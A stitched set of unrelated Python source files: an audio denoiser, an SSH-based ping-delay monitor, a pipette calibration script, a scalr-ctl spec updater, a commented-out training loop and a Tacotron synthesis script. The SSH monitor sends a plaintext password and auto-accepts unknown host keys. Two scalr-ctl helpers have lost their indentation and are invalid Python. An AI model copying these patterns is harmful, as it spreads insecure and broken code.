        denoised_signal = apply_spectral_sub(noisy_signal, nfft=512,
                                             db_reduc=10, lookback=5,
                                             beta=20, alpha=3)
    Parameters
    ----------
    nfft: int
        FFT size. Length of gain filter, i.e. the number of frequency bins, is
        given by ``nfft//2+1``.
    db_reduc: float
        Maximum reduction in dB for each bin.
    lookback: int
        How many frames to look back for the noise estimate.
    beta: float
        Overestimation factor to "push" the gain filter value (at each
        frequency) closer to the dB reduction specified by ``db_reduc``.
    alpha: float, optional
        Exponent factor to modify transition behavior towards the dB reduction
        specified by ``db_reduc``. Default is 1.
    """

    def __init__(self, nfft, db_reduc, lookback, beta, alpha=1):
        self.beta = beta
        self.alpha = alpha
        self.n_bins = nfft//2+1
        # Power history: one column per frame in the lookback window
        # (plus the current frame in the last column).
        self.p_prev = np.zeros((self.n_bins, lookback+1))
        # Minimum gain, i.e. the maximum allowed attenuation, linear scale.
        self.gmin = 10**(-db_reduc/20)
        self.p_sn = np.zeros(self.n_bins)  # signal + noise power estimate
        self.p_n = np.zeros(self.n_bins)   # noise floor estimate

    def compute_gain_filter(self, X):
        """
        Parameters
        ----------
        X: numpy array
            Complex spectrum of length ``nfft//2+1``.
        Returns
        -------
        list of float
            Gain filter to multiply given spectrum with.
        """
        # estimate of signal + noise at current time
        self.p_sn[:] = np.real(np.conj(X)*X)
        # estimate of noise level: minimum power over the lookback window
        self.p_prev[:, -1] = self.p_sn
        self.p_n[:] = np.min(self.p_prev, axis=1)
        # compute gain filter (vectorized; the tiny floor on the denominator
        # avoids the ZeroDivisionError the per-bin loop hit on silent bins,
        # which then get the minimum gain `gmin`)
        numerator = np.maximum(self.p_sn - self.beta * self.p_n, 0.)
        denominator = np.maximum(self.p_sn, 1e-30)
        gain_filter = np.maximum(
            (numerator / denominator) ** self.alpha, self.gmin
        ).tolist()
        # update the rolling power history
        self.p_prev = np.roll(self.p_prev, -1, axis=1)
        return gain_filter
def apply_spectral_sub(noisy_signal, nfft=512, db_reduc=25, lookback=12,
                       beta=30, alpha=1):
    """
    One-shot function to apply spectral subtraction approach.
    Parameters
    ----------
    noisy_signal : numpy array
        Real signal in time domain.
    nfft: int
        FFT size. Length of gain filter, i.e. the number of frequency bins, is
        given by ``nfft//2+1``.
    db_reduc: float
        Maximum reduction in dB for each bin.
    lookback: int
        How many frames to look back for the noise estimate.
    beta: float
        Overestimation factor to "push" the gain filter value (at each
        frequency) closer to the dB reduction specified by ``db_reduc``.
    alpha: float, optional
        Exponent factor to modify transition behavior towards the dB reduction
        specified by ``db_reduc``. Default is 1.
    Returns
    -------
    numpy array
        Enhanced/denoised signal.
    """
    from pyroomacoustics import hann
    from pyroomacoustics.transform import STFT

    hop = nfft // 2
    analysis_window = hann(nfft, flag='asymmetric', length='full')
    stft = STFT(nfft, hop=hop, analysis_window=analysis_window, streaming=True)
    scnr = SpectralSub(nfft, db_reduc, lookback, beta, alpha)

    denoised = np.zeros(noisy_signal.shape)
    # Process the signal one hop-sized frame at a time; any tail shorter
    # than `hop` is left as zeros, exactly like the original while-loop.
    for start in range(0, noisy_signal.shape[0] - hop + 1, hop):
        # SCNR in frequency domain
        stft.analysis(noisy_signal[start:(start + hop), ])
        gain_filt = scnr.compute_gain_filter(stft.X)
        # back to time domain
        denoised[start:start + hop, ] = stft.synthesis(gain_filt * stft.X)
    return denoised
|
<filename>ExternalTools/DelayThread.py
import logging
import pexpect
import threading
from multiprocessing import Process
import sys
class DelayMonitor():
    """Measures round-trip delay by SSH-ing into a client host and running
    `ping` against a server, parsing the RTT values from the output.

    NOTE(review): this is Python 2 code (print statements) and performs
    network I/O via pexpect; it was presumably once a threading.Thread
    subclass (see the commented-out __init__ call) but now spawns its own
    worker thread in startCapturingDelay().
    """
    def __init__(self, client_ip, client_user, client_pass, server_ip, ping_count):
        #threading.Thread.__init__(self)
        log_namespace = "Monitor."+__name__
        self.logger = logging.getLogger(log_namespace)
        self.logger.setLevel(logging.DEBUG)
        self.thread_name = "[PING:"+client_ip+"->"+server_ip+"]"
        self.CLIENT_IP = client_ip
        self.CLIENT_USER = client_user
        self.CLIENT_PASS = client_pass
        self.SERVER_IP = server_ip
        # -i 1: one ping per second; the count is appended per run.
        self.PING_COMMAND = "ping "+server_ip+" -i 1"
        self.ping_count = ping_count
        self.values = []          # all RTTs parsed during a capture
        self.finished = False     # set True when a capture run completes
        self.CONNECT_COMMAND = 'ssh '+self.CLIENT_USER+'@'+self.CLIENT_IP
        # Connection is opened eagerly; c_pexpect is None on failure.
        self.c_pexpect = self.connectClient()
        self.isConnected = False
        if(self.c_pexpect!=None):
            self.isConnected = True
        self.currentDelay = 0     # most recently parsed RTT (ms)
    def setPingCount(self, count):
        """Set how many pings the next capture will send."""
        self.ping_count = count
    def startCapturingDelay(self):
        """Start a capture in a background thread and return the thread."""
        self.values = []
        p = threading.Thread(target=self.run)
        p.start()
        self.finished = False
        return p
    def run(self):
        """Run one ping capture over the SSH session; returns True on
        success, False on any error, None when not connected."""
        try:
            if(self.isConnected!=True):
                return
            command = self.PING_COMMAND+" -c "+str(self.ping_count)
            self.c_pexpect.sendline(s=command)
            # Wait for the shell prompt ("user@") to come back after ping ends.
            self.c_pexpect.expect(self.CLIENT_USER+'@', timeout=1000, searchwindowsize=1000)
            s = self.c_pexpect.before
            self.pingAllLinesParser(s)
            self.finished = True
            return True
        except:
            print sys.exc_info()[1]
            return False
    def pingAllLinesParser(self,output):
        """Parse every per-packet line of ping output, appending each RTT
        to self.values. Assumes the `time=X` token is the 7th space-separated
        column — TODO confirm against the client's ping format."""
        try:
            lines = output.split('\n')
            for line in lines:
                if line.__contains__("icmp")==False:
                    continue
                columns = line.split(' ')
                col = columns[6]
                col = col.split('=')
                rtt_avg = float(col[1])
                self.values.append(rtt_avg)
                self.currentDelay = rtt_avg
                #print self.thread_name, self.values
        except:
            self.logger.error(self.thread_name+"Error parsing output.")
    def stopCapturingDelay(self):
        """Interrupt the running ping with Ctrl-C over the SSH session."""
        self.c_pexpect.sendcontrol('c')
    def getCurrentDelay(self):
        """Return the most recently parsed RTT value."""
        return self.currentDelay
    def connectClient(self):
        """Open the SSH session to the client host.

        Returns the pexpect child on success, None on timeout. On a first
        connection the host-key prompt is answered "yes" but None is still
        returned — NOTE(review): looks like a retry is then expected.
        """
        p = pexpect.spawn(self.CONNECT_COMMAND)
        while True:
            i=p.expect(['password:','Welcome to Ubuntu',pexpect.EOF, "Are you sure you want to continue connecting (yes/no)?"])
            if i==0:
                p.sendline(self.CLIENT_PASS)
            elif i==1:
                self.logger.debug(self.thread_name+"Login Successfull!")
                self.logger.debug(self.thread_name+"Client at %s ready."%self.CLIENT_IP)
                p.expect(self.CLIENT_USER+'@')
                return p
            elif i==2:
                self.logger.error(self.thread_name+"Connection timeout.")
                return None
            elif i==3:
                p.sendline("yes")
                return None
    def updatePing(self,ping_count):
        """Run a blocking ping and update currentDelay from its summary."""
        if(self.isConnected!=True):
            return
        self.c_pexpect.sendline(s=self.PING_COMMAND+" -c "+str(ping_count))
        self.c_pexpect.expect(self.CLIENT_USER+'@')
        s = self.c_pexpect.before
        self.pingOutputParser(s)
    def pingOutputParser(self, output):
        """Parse the rtt min/avg/max summary line and store the average."""
        try:
            lines = output.split( )
            if(len(lines)>2):
                # second-to-last token holds "min/avg/max/mdev"; avg is field 1
                last_line = lines[len(lines)-2]
                columns = last_line.split('/')
                rtt_avg = float(columns[1])
                self.currentDelay = rtt_avg
        except:
            self.logger.error(self.thread_name+"Error parsing output.")
|
#############################FILE AND LABEL CHECKS############################
# NOTE(review): this fragment relies on names defined earlier in the file
# (__flocation__, run, cals, fig, calGap, calStepFactor, calEventTimes,
# calPipette, columnLocations, qualityParameters, qualityN, calRejMan,
# calShowPlot, calAutoAgree, calManual, runName, alphabet, numbers,
# ietCalSuffix1/2, rawDataFolder) — confirm against the file header.
if not os.path.exists (__flocation__):
    sys.exit("Please add "+ rawDataFolder + " folder to current folder")
if ietCalSuffix1 == "alphabet":
    calFiles = alphabet
elif ietCalSuffix1 == "numbers":
    calFiles = numbers
else:
    sys.exit ("Please indicate how calibration suffixes are labeled and increased")
if not (os.path.exists(__flocation__ + run + "_"+ietCalSuffix1[0]+ietCalSuffix2
        ) or calManual[0] == "y"):
    sys.exit ("Please manually enter force pipette stiffness or add calibration "+
              "files to " + rawDataFolder + " folder as " + run + "_"+ietCalSuffix2+
              " starting with " + ietCalSuffix1[0]+ietCalSuffix2)
########################LABEL AND INFORMATION CREATION########################
# Build the full calibration file names, and a (cals+1) x 5 string table
# whose first row is the column headers.
calFiles = [run + "_" + s + ietCalSuffix2 for s in calFiles]
AllForcePipette = np.zeros((cals+1, 5)).astype(str)
AllForcePipette[0,0:5]=("Calibration Values Used","Sigma from average",
                        "x0Sigma","x1Sigma","x2Sigma")
# Convert gap/event times into sample indices via the step factor.
calGapF = calGap * calStepFactor
calEventTimesF = [i * calStepFactor for i in calEventTimes]
ietCals = -1
#######################CALIBRATION ITERATION FROM FILES#######################
while ietCals <= cals:
    ietCals, fig = ietCals+1, fig + 1
    if cals >= ietCals + 1:
        if not os.path.exists(__flocation__+calFiles[ietCals]):
            sys.exit ("please add " +calFiles[ietCals] + " to RawData File or edit "+
                      "number of calibration instances")
        # Raw calibration trace: position and time columns per
        # columnLocations mapping.
        calRaw = np.asmatrix(pd.read_table(__flocation__+calFiles[ietCals],sep = "\t"))
        calPosAll = calRaw[:,columnLocations["calX"]]
        calTime = calRaw[:,columnLocations["calTime"]]
        calT0 = calRaw[0]
        # Sample indices bracketing the three calibration segments
        # (baseline, first hold, second hold), offset by the gap.
        calT0,calT1,calT2,calT3,calT4,calT5 = (
            np.where(calTime>calT0)[0][0],
            np.where(calT0+calTime>(calEventTimesF[0]-calGapF))[0][0],
            np.where(calT0+calTime>(calEventTimesF[1]+calGapF))[0][0],
            np.where(calT0+calTime>(calEventTimesF[2]-calGapF))[0][0],
            np.where(calT0+calTime>(calEventTimesF[2]+calGapF))[0][0],
            np.where(calT0+calTime>calEventTimesF[3]-calGapF)[0][0])
        calX0All, calX1All, calX2All = (
            np.arange(calT0,calT1,1),
            np.arange(calT2,calT3,1),
            np.arange(calT4,calT5,1))
        calX0All,calX1All,calX2All = (
            calPosAll[[calX0All]],
            calPosAll[[calX1All]],
            calPosAll[[calX2All]])
        # Segment means relative to the baseline position.
        calX0 = np.mean(calX0All)
        calX1, calX2 = np.mean(calX1All)-calX0, np.mean(calX2All)-calX0
        if calShowPlot == "y":
            plt.figure(fig)
            plt.title(str(calFiles[ietCals]))
            plt.plot(calPosAll),plt.plot(calX0All),plt.plot(calX1All),
            plt.plot(calX2All)
        # Pipette stiffness from the ratio of the two deflection steps.
        forcePipStr = calPipette * (calX2-calX1)/(calX1)
        ####################CONSOLIDATES CALIBRATION INSTANCE DATA####################
        AllForcePipette[ietCals+1,(0,2,3,4)] = (forcePipStr,
                                                np.std(calX0All),
                                                np.std(calX1All),
                                                np.std(calX2All))
####################CONSOLIDATES AND ANALYZES CALIBRATION#####################
# Column 1 holds each instance's distance from the mean in standard
# deviations; manual rejections (calRejMan) are removed first.
AllForcePipetteUncut = AllForcePipette
AllForcePipetteUncut [1:,1] = (abs(AllForcePipetteUncut[1:,0].astype(float) -
                               np.mean(AllForcePipetteUncut[1:,0].astype(float)))/
                               np.std(AllForcePipetteUncut[1:,0].astype(float)))
AllForcePipette = np.delete(AllForcePipette,calRejMan,axis=0)
calN = len(AllForcePipette)-1
AForcePipette = np.mean((AllForcePipette[1:calN+1,0]).astype(float))
AForcePipetteSterr = np.std(AllForcePipette[1:calN+1,0].astype(float))/(
                     np.size(AllForcePipette[1:calN+1,0])**0.5)
AllForcePipette[1:,1] = (abs(AllForcePipette[1:,0].astype(float) -
                         np.mean(AllForcePipette[1:,0].astype(float)))/
                         np.std(AllForcePipette[1:,0].astype(float)))
calRej = calRejMan
AllForcePipetteUncut[0,0] = "All Calibrations Uncut"
#############CALCULATES DATA QUALITY AND ATTEMPTS TO MAKE IT GOOD#############
# Iteratively reject the worst outlier until the relative standard error
# meets the first quality threshold or too few instances remain.
if calAutoAgree == "y":
    while AForcePipetteSterr/AForcePipette > qualityParameters[1][0] and (
            calN > qualityN["N"]):
        calOutlier = (np.where((AllForcePipette[:,1]) == (max(AllForcePipette[
                      1:,1].astype(float))).astype(str)))
        calRej = calRej + [np.where(AllForcePipetteUncut[1:,0].astype(
                 float)==AllForcePipette[[calOutlier[0][0]],0].astype(float)[0])[0][0]+1]
        AllForcePipette = np.delete(AllForcePipette,calOutlier,axis=0)
        calN = calN - 1
        AForcePipette = np.mean((AllForcePipette[1:,0]).astype(float))
        AForcePipetteSterr = (np.std(AllForcePipette[1:,0].astype(float))/(
                              np.size(AllForcePipette[1:,0])**0.5))
        AllForcePipette[1:,1] = ((abs(AllForcePipette[1:,0].astype(float)-
                                  AForcePipette.astype(float)))/
                                  np.std(AllForcePipette[1:,0].astype(float)))
# Grade the calibration against the quality thresholds.
if calN >= qualityN["N"] and any(AForcePipetteSterr/AForcePipette < (
        np.asarray(qualityParameters[1][:]))):
    calQuality = qualityParameters[0][max(np.where(AForcePipetteSterr/
                 AForcePipette<(np.asarray(qualityParameters[1][:])))[0])]
else:
    calQuality = qualityParameters[2][0]
########################PRINTS CALIBRATION INFORMATION########################
print (runName + " Force Pipette equal to " + str(round(AForcePipette,2)))
print ("Calibrations were of " + calQuality + " quality")
if len (calRej) == 0:
    print ("No Calibrations were rejected")
else:
    print ("Calibrations " + str(calRej) + " were rejected")
<gh_stars>1-10
# -*- coding: utf-8 -*-
import os
import sys
import json
import traceback
import six
import yaml
import requests
from scalrctl import click, defaults, settings, commands, utils
__author__ = '<NAME>, <NAME>'
def _get_spec_path(api_level, extension):
    """Return the on-disk path of the cached spec file for *api_level*."""
    filename = '{}.{}'.format(api_level, extension)
    return os.path.join(defaults.CONFIG_DIRECTORY, filename)
def _is_spec_exists(api_level, extension):
    """Return True when the cached spec file for *api_level* is on disk."""
    spec_path = _get_spec_path(api_level, extension)
    return os.path.exists(spec_path)
def _load_yaml_spec(api_level):
    """Download and return the YAML API spec text for *api_level*.

    Raises requests exceptions on HTTP failure. On an SSL certificate
    error it additionally checks whether the interpreter supports SNI
    and prints an actionable message before exiting when it does not.
    """
    spec_url = "{0}://{1}/api/{2}.{3}.yml".format(settings.API_SCHEME,
                                                  settings.API_HOST,
                                                  api_level,
                                                  settings.API_VERSION)
    try:
        resp = requests.get(spec_url, verify=settings.SSL_VERIFY_PEER)
        resp.raise_for_status()
        # NOTE(review): raise_for_status() already raised for non-2xx, so
        # this extra check only fires for non-200 success codes (e.g. 204).
        if resp.status_code != 200:
            raise requests.exceptions.HTTPError(
                "Expected code: 200, got: {}".format(resp.status_code))
        return resp.text
    except requests.exceptions.SSLError as e:
        import ssl
        if 'CertificateError' in str(e):
            # A hostname-mismatch style failure: on old Pythons this is
            # typically caused by missing SNI support, so probe for it.
            sni_supported = None
            try:
                from OpenSSL._util import lib as _lib
                if _lib.Cryptography_HAS_TLSEXT_HOSTNAME:
                    sni_supported = True
            except ImportError:
                sni_supported = False
            if not sni_supported:
                errmsg = "\nError: Your Python version %s does not support SNI. " \
                         "This can be resolved by upgrading Python to version 2.7.9 or " \
                         "by installing pyOpenSSL>=17.3.0. More info in Requests FAQ: " \
                         "http://docs.python-requests.org/en/master/community/faq/#what-are-hostname-doesn-t-match-errors" \
                         " \nIf you are having problems installing pyOpenSSL try to upgrade pip first." % sys.version[:5]
                click.echo(errmsg)
                sys.exit()
        # Any other SSL error (or SNI-capable setups) propagates unchanged.
        raise
def _read_spec(spec_path):
text = None
if os.path.exists(spec_path):
with open(spec_path, "r") as fp:
text = fp.read()
return text
def _write_spec(spec_path, text):
with open(spec_path, "w") as fp:
fp.write(text)
def _update_spec(api_level):
    """
    Downloads yaml spec and converts it to JSON.
    Both files are stored in configuration directory; the yaml copy is
    only rewritten when its content actually changed.

    Returns:
        tuple: ``(True, None)`` on success, ``(False, reason)`` on failure.
    """
    try:
        try:
            yaml_spec_text = _load_yaml_spec(api_level)
        except requests.exceptions.RequestException as e:
            raise Exception("Can\'t load spec file. Request failed. {}".format(str(e)))
        try:
            struct = yaml.safe_load(yaml_spec_text)
            json_spec_text = json.dumps(struct)
        except (KeyError, TypeError, yaml.YAMLError):
            # Fix: six.reraise(type(e), "<message string>") crashed with
            # AttributeError because reraise expects an exception *instance*
            # as its second argument, masking the real parse failure. Raise
            # a plain Exception so the outer handler reports the traceback.
            raise Exception("Swagger specification is not valid:\n{}"
                            .format(traceback.format_exc()))
        yaml_spec_path = _get_spec_path(api_level, 'yaml')
        json_spec_path = _get_spec_path(api_level, 'json')
        old_yaml_spec_text = _read_spec(yaml_spec_path)
        # update yaml spec only when the upstream content changed
        if yaml_spec_text != old_yaml_spec_text:
            _write_spec(yaml_spec_path, yaml_spec_text)
        # update json spec and routes
        _write_spec(json_spec_path, json_spec_text)
        return True, None
    except Exception as e:
        # Single failure channel: callers get (False, human-readable reason).
        return False, str(e) or 'Unknown reason'
class UpdateScalrCTL(commands.BaseAction):
    """``scalr-ctl update`` action: refresh the cached API specifications."""

    def run(self, *args, **kwargs):
        """Trigger a spec update for every configured API level."""
        update()

    def get_description(self):
        """Return the one-line help text shown for this action."""
        return "Fetch new API specification if available."
def is_update_required():
    """
    Determine if spec update is needed.

    Returns False while an explicit ``update``/``configure`` command is
    running (so the update never runs twice); otherwise True when any API
    level is missing either its yaml or json cached spec.
    """
    # prevent from running 'update' more than once
    if 'update' in sys.argv or 'configure' in sys.argv:
        return False
    return not all(
        _is_spec_exists(api, 'yaml') and _is_spec_exists(api, 'json')
        for api in defaults.API_LEVELS
    )
def update():
    """
    Update spec for all available APIs, reporting per-level success/failure.
    """
    total = len(defaults.API_LEVELS)
    for index, api_level in enumerate(defaults.API_LEVELS, 1):
        click.echo('[{}/{}] Updating specifications for {} API ... '
                   .format(index, total, api_level), nl=False)
        # Show a spinner while the (potentially slow) download runs.
        with utils._spinner():
            success, fail_reason = _update_spec(api_level)
        if success:
            click.secho('Done', fg='green')
        else:
            click.secho('Failed: {}'.format(fail_reason), fg='red')
|
# def self_training(args):
# """Perform self-training
#
# First load decoding results on disjoint data
# also load pre-trained model and perform supervised
# training on both existing training data and the
# decoded results
# """
#
# print('load pre-trained model from [%s]' % args.load_model, file=sys.stderr)
# params = torch.load(args.load_model, map_location=lambda storage, loc: storage)
# vocab = params['vocab']
# transition_system = params['transition_system']
# saved_args = params['args']
# saved_state = params['state_dict']
#
# # transfer arguments
# saved_args.cuda = args.cuda
# saved_args.save_to = args.save_to
# saved_args.train_file = args.train_file
# saved_args.unlabeled_file = args.unlabeled_file
# saved_args.dev_file = args.dev_file
# saved_args.load_decode_results = args.load_decode_results
# args = saved_args
#
# update_args(args, arg_parser)
#
# model = Parser(saved_args, vocab, transition_system)
# model.load_state_dict(saved_state)
#
# if args.cuda: model = model.cuda()
# model.train()
# optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
#
# print('load unlabeled data [%s]' % args.unlabeled_file, file=sys.stderr)
# unlabeled_data = Dataset.from_bin_file(args.unlabeled_file)
#
# print('load decoding results of unlabeled data [%s]' % args.load_decode_results, file=sys.stderr)
# decode_results = pickle.load(open(args.load_decode_results))
#
# labeled_data = Dataset.from_bin_file(args.train_file)
# dev_set = Dataset.from_bin_file(args.dev_file)
#
# print('Num. examples in unlabeled data: %d' % len(unlabeled_data), file=sys.stderr)
# assert len(unlabeled_data) == len(decode_results)
# self_train_examples = []
# for example, hyps in zip(unlabeled_data, decode_results):
# if hyps:
# hyp = hyps[0]
# sampled_example = Example(idx='self_train-%s' % example.idx,
# src_sent=example.src_sent,
# tgt_code=hyp.code,
# tgt_actions=hyp.action_infos,
# tgt_ast=hyp.tree)
# self_train_examples.append(sampled_example)
# print('Num. self training examples: %d, Num. labeled examples: %d' % (len(self_train_examples), len(labeled_data)),
# file=sys.stderr)
#
# train_set = Dataset(examples=labeled_data.examples + self_train_examples)
#
# print('begin training, %d training examples, %d dev examples' % (len(train_set), len(dev_set)), file=sys.stderr)
# print('vocab: %s' % repr(vocab), file=sys.stderr)
#
# epoch = train_iter = 0
# report_loss = report_examples = 0.
# history_dev_scores = []
# num_trial = patience = 0
# while True:
# epoch += 1
# epoch_begin = time.time()
#
# for batch_examples in train_set.batch_iter(batch_size=args.batch_size, shuffle=True):
# batch_examples = [e for e in batch_examples if len(e.tgt_actions) <= args.decode_max_time_step]
#
# train_iter += 1
# optimizer.zero_grad()
#
# loss = -model.score(batch_examples)
# # print(loss.data)
# loss_val = torch.sum(loss).data[0]
# report_loss += loss_val
# report_examples += len(batch_examples)
# loss = torch.mean(loss)
#
# loss.backward()
#
# # clip gradient
# if args.clip_grad > 0.:
# grad_norm = torch.nn.utils.clip_grad_norm(model.parameters(), args.clip_grad)
#
# optimizer.step()
#
# if train_iter % args.log_every == 0:
# print('[Iter %d] encoder loss=%.5f' %
# (train_iter,
# report_loss / report_examples),
# file=sys.stderr)
#
# report_loss = report_examples = 0.
#
# print('[Epoch %d] epoch elapsed %ds' % (epoch, time.time() - epoch_begin), file=sys.stderr)
# # model_file = args.save_to + '.iter%d.bin' % train_iter
# # print('save model to [%s]' % model_file, file=sys.stderr)
# # model.save(model_file)
#
# # perform validation
# print('[Epoch %d] begin validation' % epoch, file=sys.stderr)
# eval_start = time.time()
# eval_results = evaluation.evaluate(dev_set.examples, model, args, verbose=True)
# dev_acc = eval_results['accuracy']
# print('[Epoch %d] code generation accuracy=%.5f took %ds' % (epoch, dev_acc, time.time() - eval_start), file=sys.stderr)
# is_better = history_dev_scores == [] or dev_acc > max(history_dev_scores)
# history_dev_scores.append(dev_acc)
#
# if is_better:
# patience = 0
# model_file = args.save_to + '.bin'
# print('save currently the best model ..', file=sys.stderr)
# print('save model to [%s]' % model_file, file=sys.stderr)
# model.save(model_file)
# # also save the optimizers' state
# torch.save(optimizer.state_dict(), args.save_to + '.optim.bin')
# elif epoch == args.max_epoch:
# print('reached max epoch, stop!', file=sys.stderr)
# exit(0)
# elif patience < args.patience:
# patience += 1
# print('hit patience %d' % patience, file=sys.stderr)
#
# if patience == args.patience:
# num_trial += 1
# print('hit #%d trial' % num_trial, file=sys.stderr)
# if num_trial == args.max_num_trial:
# print('early stop!', file=sys.stderr)
# exit(0)
#
# # decay lr, and restore from previously best checkpoint
# lr = optimizer.param_groups[0]['lr'] * args.lr_decay
# print('load previously best model and decay learning rate to %f' % lr, file=sys.stderr)
#
# # load model
# params = torch.load(args.save_to + '.bin', map_location=lambda storage, loc: storage)
# model.load_state_dict(params['state_dict'])
# if args.cuda: model = model.cuda()
#
# # load optimizers
# if args.reset_optimizer:
# print('reset optimizer', file=sys.stderr)
# optimizer = torch.optim.Adam(model.inference_model.parameters(), lr=lr)
# else:
# print('restore parameters of the optimizers', file=sys.stderr)
# optimizer.load_state_dict(torch.load(args.save_to + '.optim.bin'))
#
# # set new lr
# for param_group in optimizer.param_groups:
# param_group['lr'] = lr
#
# # reset patience
# patience = 0
#
|
"""ESpeak like synthesize to be used with aeneas."""
import argparse
import os
import time
import tensorflow as tf
from hparams import hparams
from infolog import log
from tacotron.synthesizer import Synthesizer
from tqdm import tqdm
def prepare_run(args):
    """Resolve checkpoint folders and hyper-parameters for a synthesis run.

    Returns a ``(taco_checkpoint, wave_checkpoint, hparams)`` tuple; the
    run folder names fall back from ``--name`` to the model-specific name
    to ``--model``.
    """
    modified_hp = hparams.parse(args.hparams)
    os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'  # silence TF info/warning logs
    taco_run = args.name or args.tacotron_name or args.model
    taco_checkpoint = os.path.join('logs-' + taco_run, 'taco_' + args.checkpoint)
    wave_run = args.name or args.wavenet_name or args.model
    wave_checkpoint = os.path.join('logs-' + wave_run, 'wave_' + args.checkpoint)
    return taco_checkpoint, wave_checkpoint, modified_hp
def get_sentences(args):
    """Pick the sentences to synthesize.

    Precedence: ``args.text_list`` (one sentence per line), then
    ``args.text`` (newlines collapsed to spaces), then the defaults
    shipped in ``hparams.sentences``.
    """
    if args.text_list != '':
        return args.text_list.splitlines()
    if args.text != '':
        return [args.text.replace('\n', ' ')]
    return hparams.sentences
def run_eval(args, checkpoint_path, output_dir, hparams, sentences):
    """Synthesize every sentence with a restored Tacotron model.

    Writes wavs/plots under ``<output_dir>/logs-eval``, mel spectrograms
    under ``<output_dir>/eval``, and a ``map.txt`` with one
    ``text|mel_filename|speaker_id`` line per synthesized sentence.

    Params:
        args: Parsed CLI namespace (``model`` and ``mels_dir`` read here).
        checkpoint_path (str): Checkpoint to restore the synthesizer from.
        output_dir (str): Root folder for all synthesis outputs.
        hparams: Hyper-parameter object (synthesis batch size read here).
        sentences (list): Flat list of sentences to synthesize.

    Returns:
        str: The ``eval`` directory containing the mel outputs.
    """
    eval_dir = os.path.join(output_dir, 'eval')
    log_dir = os.path.join(output_dir, 'logs-eval')
    if args.model == 'Tacotron-2':
        # The downstream WaveNet stage reads mels from args.mels_dir, so
        # the two locations must agree.
        assert os.path.normpath(eval_dir) == os.path.normpath(args.mels_dir)
    #Create output path if it doesn't exist
    os.makedirs(eval_dir, exist_ok=True)
    os.makedirs(log_dir, exist_ok=True)
    os.makedirs(os.path.join(log_dir, 'wavs'), exist_ok=True)
    os.makedirs(os.path.join(log_dir, 'plots'), exist_ok=True)
    synth = Synthesizer()
    synth.load(checkpoint_path, hparams)
    #Set inputs batch wise: regroup the flat sentence list into batches
    sentences = [sentences[i: i+hparams.tacotron_synthesis_batch_size] for i in range(0, len(sentences), hparams.tacotron_synthesis_batch_size)]
    #log('Starting Synthesis')
    with open(os.path.join(eval_dir, 'map.txt'), 'w') as file:
        for i, texts in enumerate(tqdm(sentences)):
            # NOTE(review): `start` is never used — per-batch timing output
            # was presumably removed along with the log() calls below.
            start = time.time()
            basenames = ['batch_{}_sentence_{}'.format(i, j) for j in range(len(texts))]
            mel_filenames, speaker_ids = synth.synthesize(texts, basenames, eval_dir, log_dir, None)
            for elems in zip(texts, mel_filenames, speaker_ids):
                file.write('|'.join([str(x) for x in elems]) + '\n')
    #log('synthesized mel spectrograms at {}'.format(eval_dir))
    return eval_dir
def tacotron_synthesize(args, hparams, checkpoint, sentences=None):
    """Load the latest Tacotron checkpoint and run eval synthesis.

    Parameters:
        args: parsed CLI options (argparse.Namespace).
        hparams: hyperparameters; must define tacotron_synthesis_batch_size
            and tacotron_num_gpus.
        checkpoint: directory containing the TF checkpoint state file.
        sentences: list of sentences to synthesize, or None.

    Returns the eval output directory (see run_eval).

    Raises:
        RuntimeError: no checkpoint could be located.
        ValueError: synthesis batch size incompatible with the GPU count.
    """
    output_dir = 'tacotron_' + args.output_dir
    # tf.train.get_checkpoint_state returns None (it does not raise) when no
    # checkpoint file exists, so check explicitly. The old bare ``except:``
    # also swallowed KeyboardInterrupt/SystemExit and hid the real error.
    try:
        ckpt_state = tf.train.get_checkpoint_state(checkpoint)
    except Exception as exc:
        raise RuntimeError('Failed to load checkpoint at {}'.format(checkpoint)) from exc
    if ckpt_state is None or not ckpt_state.model_checkpoint_path:
        raise RuntimeError('Failed to load checkpoint at {}'.format(checkpoint))
    checkpoint_path = ckpt_state.model_checkpoint_path
    log('loaded model at {}'.format(checkpoint_path))
    if hparams.tacotron_synthesis_batch_size < hparams.tacotron_num_gpus:
        raise ValueError('Defined synthesis batch size {} is smaller than minimum required {} (num_gpus)! Please verify your synthesis batch size choice.'.format(
            hparams.tacotron_synthesis_batch_size, hparams.tacotron_num_gpus))
    if hparams.tacotron_synthesis_batch_size % hparams.tacotron_num_gpus != 0:
        raise ValueError('Defined synthesis batch size {} is not a multiple of {} (num_gpus)! Please verify your synthesis batch size choice!'.format(
            hparams.tacotron_synthesis_batch_size, hparams.tacotron_num_gpus))
    return run_eval(args, checkpoint_path, output_dir, hparams, sentences)
def _build_parser(accepted_modes):
    """Construct the command-line argument parser."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--checkpoint', default='pretrained/', help='Path to model checkpoint')
    parser.add_argument('--hparams', default='',
        help='Hyperparameter overrides as a comma-separated list of name=value pairs')
    parser.add_argument('--name', help='Name of logging directory if the two models were trained together.')
    parser.add_argument('--tacotron_name', help='Name of logging directory of Tacotron. If trained separately')
    parser.add_argument('--wavenet_name', help='Name of logging directory of WaveNet. If trained separately')
    parser.add_argument('--model', default='Tacotron')
    parser.add_argument('--input_dir', default='training_data/', help='folder to contain inputs sentences/targets')
    parser.add_argument('--mels_dir', default='tacotron_output/eval/', help='folder to contain mels to synthesize audio from using the Wavenet')
    parser.add_argument('--output_dir', default='output/', help='folder to contain synthesized mel spectrograms')
    parser.add_argument('--mode', default='eval', help='mode of run: can be one of {}'.format(accepted_modes))
    parser.add_argument('--GTA', default='False', help='Ground truth aligned synthesis, defaults to True, only considered in synthesis mode')
    parser.add_argument('--text_list', default='', help='Sentences to separated by new lines. Valid if mode=eval')
    parser.add_argument("text", nargs='?', help='text to be synthesized')
    return parser


def main():
    """CLI entry point: parse arguments and run Tacotron eval synthesis."""
    accepted_modes = ['eval']
    args = _build_parser(accepted_modes).parse_args()
    taco_checkpoint, _wave_checkpoint, hparams = prepare_run(args)
    sentences = get_sentences(args)
    tacotron_synthesize(args, hparams, taco_checkpoint, sentences)


if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
# Copyright 2015 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
